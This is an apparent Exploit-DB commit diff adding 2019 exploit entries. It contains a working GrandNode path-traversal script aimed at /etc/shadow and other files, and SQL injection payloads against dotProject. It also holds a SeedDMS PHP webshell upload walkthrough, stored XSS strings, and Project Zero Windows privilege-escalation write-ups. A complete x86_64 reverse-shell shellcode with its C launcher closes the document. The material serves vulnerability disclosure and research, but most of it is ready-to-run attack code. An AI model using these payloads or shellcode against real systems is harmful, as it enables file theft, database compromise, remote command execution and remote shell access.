DB: 2019-06-25

9 changes to exploits/shellcodes GSearch 1.0.1.0 - Denial of Service (PoC) Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation dotProject 2.1.9 - SQL Injection SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting SeedDMS versions < 5.1.11 - Remote Command Execution GrandNode 4.40 - Path Traversal / Arbitrary File Download Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode
2019-06-25 05:01:51 +00:00 · 2019-06-25 05:01:51 +00:00 · 97334ae3af
commit 97334ae3af
parent 0e66e648a7
11 changed files with 511 additions and 0 deletions
--- a/exploits/multiple/webapps/47027.py
+++ b/exploits/multiple/webapps/47027.py
@ -0,0 +1,59 @@
+# Exploit Title: GrandNode Path Traversal & Arbitrary File Download (Unauthenticated)
+# Date: 06/23/3019
+# Exploit Author: Corey Robinson (https://twitter.com/CRobSec)
+# Vendor Homepage: https://grandnode.com/
+# Software Link: https://github.com/grandnode/grandnode/archive/728ca1ea2f61aead7c8c443407096b0ef476e49e.zip
+# Version: <= v4.40 (before 5/30/2019)
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2019-12276
+
+'''
+CVE-2019-12276
+
+A path traversal vulnerability in the LetsEncryptController allows remote unauthenticated users to 
+view any files that the application has read/view permissions to. This vulnerability affects 
+Windows and Unix operating systems.
+
+For more details, see: https://security401.com/grandnode-path-traversal/
+
+'''
+
+import requests
+import argparse
+
+def exploit(url, file):
+    
+    session = requests.Session()
+
+    paramsGet = {"fileName":file}
+    rawBody = "\r\n"
+
+    response = session.get("{}/LetsEncrypt/Index".format(url), data=rawBody, params=paramsGet)
+
+    if "UnauthorizedAccessException" in response.content or response.status_code == 500:
+        print("Access to the path '{}' is denied.".format(file))
+        return	
+
+    content_length = int(response.headers['Content-Length'])
+
+    if content_length == 0:
+        print("The '{}' file was not found.".format(file))	
+    else:
+        print("-" *22)
+        print(response.content)
+        print("-" *22)
+
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description='GrandNode CVE-2019-12276 Path traversal & Arbitrary File Download')
+    parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL')
+    parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download')
+    args = parser.parse_args()
+
+    exploit(args.url, args.file)
+
+# python gn.py -u http://172.16.2.22:5001 -f "/etc/passwd"
+# python gn.py -u http://172.16.2.22:5001 -f "../../../App_Data/Settings.txt"
+# python gn.py -u http://172.16.2.22:5001 -f "/etc/shadow"
+# python gn.py -u http://172.16.2.22:5001 -f "../../../web.config"
--- a/exploits/php/webapps/47021.txt
+++ b/exploits/php/webapps/47021.txt
@ -0,0 +1,117 @@
+# Exploit Title: dotProject 2.1.9 - Multiple Sql Injection (Poc)
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://dotproject.net
+# Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip
+# Version: 2.1.9
+# Category: Webapps
+# Tested on: Xampp for Windows
+# Software Description : dotProject is a volunteer supported Project Management application. There is no "company" behind this project, it is managed, maintained, developed and supported by a volunteer group and by the users themselves.
+
+==================================================================
+
+
+event_id (POST) - Sql injection PoC
+
+POST /dotProject-2.1.9/index.php?m=calendar HTTP/1.1
+Host: xxx.xxx.x.xx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.x.xx/dotProject-2.1.9/index.php?m=calendar&a=addedit
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 273
+Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+dosql=do_event_aed&event_id=0&event_project=[SQLi]&event_assigned=1&event_title=test&
+event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&
+end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+
+
+
+Parameter: event_id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: dosql=do_event_aed&event_id=0) AND 3236=3236-- rnpG&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: dosql=do_event_aed&event_id=0) AND (SELECT 7581 FROM(SELECT COUNT(*),CONCAT(0x7170787a71,(SELECT (ELT(7581=7581,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bOIA&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: dosql=do_event_aed&event_id=0) AND (SELECT 6637 FROM (SELECT(SLEEP(5)))bNDB)-- NfAk&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 1 column
+    Payload: dosql=do_event_aed&event_id=0) UNION ALL SELECT CONCAT(0x7170787a71,0x646772547a6e58774c464e54416963614c64646c7a6f6c745748597350686f535979714443794859,0x71627a6271)-- xXFB&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+
+
+==================================================================
+
+
+MULTIPART project_id ((custom) POST) - Sql Injection Poc
+
+POST /dotProject-2.1.9/index.php?m=projects HTTP/1.1
+Host: 192.168.1.33
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.33/dotProject-2.1.9/index.php?m=projects&a=addedit
+Content-Type: multipart/form-data; boundary=---------------------------9310663371787104596119761620
+Content-Length: 2749
+Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="dosql"
+
+do_project_aed
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="project_id"
+
+[SQLi]
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="project_creator"
+
+1
+.
+..snip
+..snip
+.
+
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="import_tasks_from"
+
+0
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="project_description"
+
+fasdf
+-----------------------------9310663371787104596119761620--
+
+
+
+Parameter: MULTIPART project_id ((custom) POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: 0 RLIKE (SELECT (CASE WHEN (6146=6146) THEN '' ELSE 0x28 END))
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: 0 AND EXTRACTVALUE(9751,CONCAT(0x5c,0x716b767871,(SELECT (ELT(9751=9751,1))),0x716b6a6a71))
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: 0 AND (SELECT 6725 FROM (SELECT(SLEEP(5)))WETe)
+
+
+#
+#
+#
--- a/exploits/php/webapps/47022.txt
+++ b/exploits/php/webapps/47022.txt
@ -0,0 +1,32 @@
+# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
+# Google Dork: [NA]
+# Date: [20-June-2019]
+# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
+# Vendor Homepage: [https://www.seeddms.org]
+# Software Link: [https://sourceforge.net/projects/seeddms/files/]
+# Version: [SeedDMS versions <5.1.11] (REQUIRED)
+# Tested on: [NA]
+# CVE : [CVE-2019-12744]
+
+Exploit Steps:
+
+Step 1: Login to the application and under any folder add a document.
+Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
+
+PHP Backdoor Code: 
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Step 3: Now after uploading the file check the document id corresponding to the document.
+Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
+
+Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
--- a/exploits/php/webapps/47023.txt
+++ b/exploits/php/webapps/47023.txt
@ -0,0 +1,15 @@
+# Exploit Title: [Persistent Cross-Site Scripting or Stored XSS in out/out.UsrMgr.php in SeedDMS before 5.1.11]
+# Google Dork: [NA]
+# Date: [20-June-2019]
+# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
+# Vendor Homepage: [https://www.seeddms.org]
+# Software Link: [https://sourceforge.net/projects/seeddms/files/]
+# Version: [< 5.1.11] (REQUIRED)
+# Tested on: [NA]
+# CVE : [CVE-2019-12745]
+
+Proof-of-Concept:
+
+Step 1: Login to the application and go to My account and edit user details.
+Step 2: Change the name by adding <script>alert("name")</script> 
+Step 3: Now browse to user management option in Admin-tools and click on choose user to execute the previously inserted javascript.
--- a/exploits/php/webapps/47024.txt
+++ b/exploits/php/webapps/47024.txt
@ -0,0 +1,15 @@
+# Exploit Title: [Persistent Cross-Site Scripting or Stored XSS in out/out.GroupMgr.php in SeedDMS before 5.1.11]
+# Google Dork: [NA]
+# Date: [17-June-2019]
+# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
+# Vendor Homepage: [https://www.seeddms.org]
+# Software Link: [https://sourceforge.net/projects/seeddms/files/]
+# Version: [< 5.1.11] (REQUIRED)
+# Tested on: [NA]
+# CVE : [CVE-2019-12801]
+
+Proof-of-Concept:
+
+Step 1: Login to the application and go to Groups Management in Admin tools.
+Step 2: Now create a new group as hello<script>alert("group")</script>
+Step 3: Now save it click on choose group to execute the javascript inserted above.
--- a/exploits/windows/dos/47026.txt
+++ b/exploits/windows/dos/47026.txt
@ -0,0 +1,26 @@
+# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
+# Date: 6/23/2019
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
+# Version: 1.0.1.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# Run the python script, it will create a new file "PoC.txt"
+# Copy the text from the generated PoC.txt file to clipboard
+# Paste the text in the search bar and click search
+# Click any link and app will crash
+
+
+buffer = "A" * 2000
+payload = buffer
+try:
+    f = open("PoC.txt", "w")
+    print("[+] Creating payload..")
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created")
--- a/exploits/windows/dos/47028.txt
+++ b/exploits/windows/dos/47028.txt
@ -0,0 +1,42 @@
+Windows: CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The kernel’s CmpAddRemoveContainerToCLFSLog function doesn’t safely create new transaction log containers leading to arbitrary file creation and EoP.
+
+Description:
+
+The configuration manager in the kernel supports creating registry keys within a transaction. To store the transaction log data a CLFS log file is used which is split into multiple containers. These transaction log files are stored within the same directory as the hive files with the names ending BLF. Container files, with the suffix TxR.X.regtrans-ms are created on demand if the amount of transaction data being stored is larger than available log space. 
+
+As these container files are created within the security context of the process creating the transaction this creates a problem as the CLFS driver always creates file with the previous mode set to UserMode. This would mean a non-administrator couldn’t create transactions in any hive which is stored in a location they can’t write to, which includes any HKLM hive which wouldn’t be very useful. To solve this problem before calling ClfsAddLogContainer the kernel code attaches the calling thread to the System process and disables any impersonation token which ensures the call to CLFS will come from the SYSTEM user. 
+
+This becomes an issue for the user’s registry hives as those hive files are located in user writable locations. Therefore as the names of the containers are predictable (just using an incrementing counter) it’s possible to redirect the container file creation through abusing symbolic links. 
+
+Due to the location of the hive file it’d seem initially difficult to exploit this as a normal user as you can’t introduce a NTFS mount point in a parent path as you can’t delete/rename the existing hive files while the user is logged in. On newer versions of Windows with Developer Mode enabled you could create NTFS symbolic links but we’ve got to assume that this setting wouldn’t be enabled by default. It turns out looking at the call to IoCreateFileEx in CLFS that it doesn’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE which means it’s exploitable by abusing mount points as if it were a file level symbolic link (as documented in https://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-arbitrary.html). The file is created with the security descriptor of the original hive/transaction log which means the user can write to the created file.
+
+However this only works until 1803 which fixes this behavior and blocks reparsing from a mount point to a normal file. I’ve not investigated in depth but based on the flags set in the call in Process Monitor this “fix” works by setting the FILE_DIRECTORY_FILE in the parse context if a mount point is encountered before the driver returns STATUS_REPARSE. Ironically this behavior works in our favor, as the call is a FILE_CREATE disposition call then the file doesn’t exist anyway and by dropping a mount point named appropriately the CLFS code will create an arbitrary directory even though the code didn’t originally specify that requirement. Once CLFS realizes it’s created a directory (or at least something it can’t write to) it tries to back out and deletes the new directory, however if we’re quick we can write a file to the new directory (again as the security descriptor grants us access) which makes the delete operation fail. We can then use the directory to get system privileges, such as through abusing the DiagnosticsHub Collector Service.
+
+Funnily enough I think prior to 1803 this would be harder to exploit as the transaction logs seem to be deleted when the user logs out and it wouldn’t be possible to modify the contents of the newly created arbitrary file as it only allows read sharing. An unexpected consequence of a security mitigation it seems.
+
+Fixing wise there’s at least two things you could do. Firstly the generated name is under control of the kernel and so could be more random to prevent resource planting attacks. You could also modify CLFS to specify explicitly FILE_NON_DIRECTORY_FILE and maybe FILE_OPEN_REPARSE_POINT to prevent abuse of mount points and even symbolic links if the target is an NTFS symbolic link.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will use the vulnerability to create an arbitrary directory (on 1809 at least). Note that you’re likely to need at least two CPUs for the exploit to be successful as it requires winning the race between the directory being created and then being deleted. Note that if you get an error stating the transaction log file was full then it failed to capture the directory. Try running the PoC again as it should be possible to run it multiple times without significant consequence (although the transaction functionality of the user’s registry _might_ be broken).
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC passing the name of a directory to create 
+3) The PoC should print the opened directory and granted access.
+
+Expected Result:
+The file creation 
+
+Observed Result:
+The arbitrary directory was created and is writable by the current user.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47028.zip
--- a/exploits/windows/dos/47029.txt
+++ b/exploits/windows/dos/47029.txt
@ -0,0 +1,70 @@
+Windows: Windows Font Cache Service Insecure Sections EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The Windows Font Cache Service exposes section objects insecurely to low privileged users resulting in EoP.
+
+Description:
+
+The Windows Font Cache Service is used to speed up the performance of DirectWrite font renderer by caching various pieces of font information in a central location. The cache can then be accessed over a custom ALPC connection. In order to support passing back large data sets, such as the cache, the service makes use of memory mapped files. Rather than sharing the sections using a global name the service opens a handle to the calling process (using NtAlpcOpenSenderProcess) then duplicates the section handle into the caller. When the ALPC call returns the caller can pick up the section handle and map it.
+
+Almost certainly for reasons of security the service doesn’t give the caller a section object with SECTION_MAP_WRITE access as it doesn’t want the caller to modify the contents of the cached data, only read from it. Therefore when duplicating the handle it only specifies SECTION_MAP_READ which removes the write access from the handle. Unfortunately there’s a problem, specifically the section objects are created without a name or a security descriptor. This means there’s no security on the object (you can’t even set a security descriptor after creation) which means the caller can just call DuplicateHandle again to get back write access on the section handle, map the section as writeable and modify the contents. This behavior was the topic of my first Project Zero blog post (https://googleprojectzero.blogspot.com/2014/10/did-man-with-no-name-feel-insecure.html) where Chrome had a very similar use case and subsequent vulnerability.
+
+How can this be exploited? The cached data has a lot of complex binary data therefore there’s likely to be some memory corruption vulnerability here as there’s a presumption that only the service could modify the data. That said there does seem to be an enormous number of checks (and checksums) in the code and not being one for fuzzing this is probably a difficult approach. I think the cache also contains file paths, it’s possible that this might be modified to read arbitrary files as there’s an ALPC call to get a file handle, although this would only run at LOCAL SERVICE so it’s not much better than a normal user’s access but might be useful from an AppContainer.
+
+Instead of fuzzing the file format I decided to look elsewhere, there’s another vulnerable section object which is passed back from a call to AlpcServer::ProcessGetEventBufferMessage which seems to be a simple event log in a circular buffer. The service stores the current write location at offset 0x10 into the mapped section. As we can change the section back to write we can modify the offset, cause a logged event to occur and get a memcpy into an address up to 2GB relative to the start of the mapped log inside the service. As the service doesn’t expect this value to be modified by other processes it doesn’t do any bounds checks. For example here’s a crash when setting the pointer to 0x7FFFFFFF:
+
+(2f40.10a4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+msvcrt!memcpy+0x1cc:
+00007ff8`5dd34a0c 488901          mov     qword ptr [rcx],rax ds:000001ec`931b0043=????????????????
+
+0:002> k
+ # Child-SP          RetAddr           Call Site
+00 00000055`dbfff818 00007ff8`2a8015e2 msvcrt!memcpy+0x1cc
+01 00000055`dbfff820 00007ff8`2a7fb2b9 fntcache!SharedCircularEventSink::LogEvent+0x3d2
+02 00000055`dbfffa00 00007ff8`2a7faf24 fntcache!EventLogger::LogGenericEvent+0x89
+03 00000055`dbfffa70 00007ff8`2a7fabb6 fntcache!AlpcServer::ProcessCacheHandleRequest+0x84
+04 00000055`dbfffb90 00007ff8`2a808c35 fntcache!AlpcServer::ProcessMessage+0x24e
+05 00000055`dbfffc30 00007ff8`2a808b17 fntcache!AlpcServer::Run+0x105
+06 00000055`dbfffce0 00007ff8`5dc181f4 fntcache!AlpcServer::ThreadProc+0x17
+07 00000055`dbfffd30 00007ff8`5f54a251 KERNEL32!BaseThreadInitThunk+0x14
+08 00000055`dbfffd60 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+
+0:002> dc @rcx-7FFFFFFF
+000001ec`131b0044  6961772c 33300a74 2039302f 343a3332  ,wait.03/09 23:4
+000001ec`131b0054  34343a32 3435392e 3530362c 30312c36  2:44.954,6056,10
+000001ec`131b0064  38353030 6361432c 74436568 64612c78  0058,CacheCtx,ad
+000001ec`131b0074  656c4564 69622c6d 70616d74 2f33300a  dElem,bitmap.03/
+000001ec`131b0084  32203930 32343a33 2e34343a 2c343539  09 23:42:44.954,
+000001ec`131b0094  30363234 3030312c 2c393030 63706c41  4260,100009,Alpc
+000001ec`131b00a4  2c727653 74617473 69682c65 33300a74  Svr,state,hit.03
+000001ec`131b00b4  2039302f 343a3332 34343a32 3435392e  /09 23:42:44.954
+
+We can see that RCX is 0x7FFFFFFF above the start of the buffer (the buffer has a 0x44 byte header) and RCX is used at the target of the memcpy call. While we don’t fully control the contents of the write it is at least predictable, bounded in size and therefore almost certainly exploitable. At least this is the best I could find without spending my time reverse engineering the cache format for no real benefit. 
+
+The ALPC server is accessible to all users as well as all AppContainers and Edge LPAC. So this bug could potentially be used to escape the sandbox. There are many questions about this code which I can’t readily answer, like why use raw ALPC rather than RPC or when not use the handle duplication facility of ALPC to pass the handle back rather than relying on duplication (not that it would have made this behavior any safer of course). 
+
+Fixing wise, there’s a few different ways you could go about it. Since Windows 8 all unnamed objects can now enforce a security descriptor as long as it’s specified when creating the new object. Specifying a restrictive DACL the caller won’t have permission to reduplicate back to a writable object. This won’t work on Windows 7 and below (assuming the code goes back that far), you can specify a security descriptor but it’ll be ignored. For 7 you can assign a randomly generated name (or add it to an anonymous directory object then release the directory). For file based sections, such as the caches you could create separate section objects which are only marked for read access and duplicate those which should stop a user converting to writable. Finally you could just directly map the sections into the caller using NtMapViewOfSection which takes a process handle.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will query for the event buffer section object over ALPC, duplicate the section object to be writable, modify the current write offset then cause the service to generate a new log entry. This process will result in an OOB memcpy in the service when writing the log entry.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) Attach a debugger to the Windows Font Cache Service to see the crash.
+3) As a normal user run the PoC.
+
+Expected Result:
+The event buffer section object is read-only.
+
+Observed Result:
+The event buffer section object can be duplicated back to writable and the event buffer modified leading to an arbitrary memcpy in the context of the service.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47029.zip
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6481,6 +6481,9 @@ id,file,description,date,author,type,platform,port
 47003,exploits/multiple/dos/47003.txt,"Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
 47004,exploits/multiple/dos/47004.txt,"Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
 47015,exploits/linux/dos/47015.c,"Linux - Use-After-Free via race Between modify_ldt() and #BR Exception",2019-06-20,"Google Security Research",dos,linux,
+47026,exploits/windows/dos/47026.txt,"GSearch 1.0.1.0 - Denial of Service (PoC)",2019-06-24,0xB9,dos,windows,
+47028,exploits/windows/dos/47028.txt,"Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation",2019-06-24,"Google Security Research",dos,windows,
+47029,exploits/windows/dos/47029.txt,"Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation",2019-06-24,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -41421,3 +41424,8 @@ id,file,description,date,author,type,platform,port
 47011,exploits/aspx/webapps/47011.py,"BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution",2019-06-19,"Aaron Bishop",webapps,aspx,
 47013,exploits/php/webapps/47013.py,"WebERP 4.15 - SQL injection",2019-06-20,"Semen Alexandrovich Lyhin",webapps,php,
 47014,exploits/aspx/webapps/47014.py,"BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection",2019-06-20,"Aaron Bishop",webapps,aspx,
+47021,exploits/php/webapps/47021.txt,"dotProject 2.1.9 - SQL Injection",2019-06-24,"Metin Yunus Kandemir",webapps,php,
+47023,exploits/php/webapps/47023.txt,"SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting",2019-06-24,"Nimit Jain",webapps,php,
+47024,exploits/php/webapps/47024.txt,"SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting",2019-06-24,"Nimit Jain",webapps,php,
+47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php,
+47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -971,3 +971,4 @@ id,file,description,date,author,type,platform
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64
 46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86
 47008,shellcodes/linux_x86-64/47008.c,"Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)",2019-06-18,"Aron Mihaljevic",shellcode,linux_x86-64
+47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64
--- a/shellcodes/linux_x86-64/47025.c
+++ b/shellcodes/linux_x86-64/47025.c
@ -0,0 +1,126 @@
+/*
+ 
+Title: Linux/x86_64 - Reverse(0.0.0.0:4444/TCP)Shell(/bin/sh)- Null Free Shellcode
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  70 bytes
+;github = https://github.com/STARRBOY
+
+compilation and execution of assembly code
+-------------------------------------
+nasm -felf64 reverse.nasm -o reverse.o
+ld reverse.o -o reverse
+---------------------------
+dumping binaries
+----------------------------------------------------------------------------------
+for i in $(objdump -d reverse |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
+----------------------------------------------------------------------------------
+C program 
+-------------------------------------------------------------------
+gcc -fno-stack-protector -z execstack reverse_tcp.c -o reverse_tcp
+----------------------------------------------------------------
+test:
+open a terminal and run this " nc -l 0.0.0.0 4444 "
+
+after you have done that, 
+open another one and run a shellcode
+
+
+
+global _start
+
+section .text
+
+_start:
+	 
+        
+    ; create socket 
+        ; sock = socket(AF_INET, SOCK_STREAM, 0)
+        ; AF_INET = 2
+        ; SOCK_STREAM = 1
+        ; syscall number 41 	
+       
+	push 41       	;sys_socket
+	pop rax		
+        push 2		; AF_INET
+        pop rdi
+       	push 1		;SOCK_STREAM
+        pop rsi
+        xor rdx,	rdx		;rdx = 0
+        syscall
+
+
+	xchg rdi,	rax	;save a socket descriptor
+	
+connect:
+	
+	; struct sockaddr_in addr;
+    	; addr.sin_family = AF_INET;
+    	; addr.sin_port = htons(4444);
+   	; addr.sin_addr.s_addr = inet_addr("0.0.0.0");
+   	; connect(connect_socket_fd, (struct sockaddr *)&addr, sizeof(addr));
+	
+	push    2               ;sin_family = AF_INET
+        mov word [rsp + 2], 0x5c11      ;port = 4444
+        push    rsp
+	
+	push	42		;sys_connect
+	pop 	rax 		
+				;rdi already contains a socket descriptor
+	pop 	rsi		;(addr.sin_port,2 bytes) push htons(4444)
+	push	16		;sizeof(addr)
+	pop	rdx
+	syscall
+
+    	push 	3		;push counter
+        pop 	rsi
+dup2loop:
+	
+        ; int dup2(int oldfd, int newfd);
+
+	push	33		;dup2 syscall
+	pop	rax
+        dec 	rsi		;next number
+        syscall
+        loopnz dup2loop  	;loop
+	
+spawn_shell:
+
+	; int execve(const char *filename, char *const argv[],char *const envp[]);
+
+
+	xor     rsi,	rsi			 ;clear rsi
+	push	rsi			         ;push null on the stack
+	mov 	rdi,	0x68732f2f6e69622f	 ;/bin//sh in reverse order
+	push	rdi
+	push	rsp		
+	pop	rdi	        		 ;stack pointer to /bin//sh
+	mov 	al,	    59      		 ;sys_execve
+	cdq					 ;sign extend of eax
+	syscall
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[]=\
+		 "\x6a\x29\x58\x6a\x02\x5f\x6a\x01"
+		 "\x5e\x48\x31\xd2\x0f\x05\x48\x97"
+		 "\x6a\x02\x66\xc7\x44\x24\x02\x11"
+		 "\x5c\x54\x6a\x2a\x58\x5e\x6a\x10"
+		 "\x5a\x0f\x05\x6a\x03\x5e\x6a\x21"
+		 "\x58\x48\xff\xce\x0f\x05\xe0\xf6"
+		 "\x48\x31\xf6\x56\x48\xbf\x2f\x62"
+		 "\x69\x6e\x2f\x2f\x73\x68\x57\x54"
+		 "\x5f\xb0\x3b\x99\x0f\x05";
+
+
+int main(){
+
+        printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
+
+        int (*ret)() = (int(*)())shellcode;
+
+        ret();
+}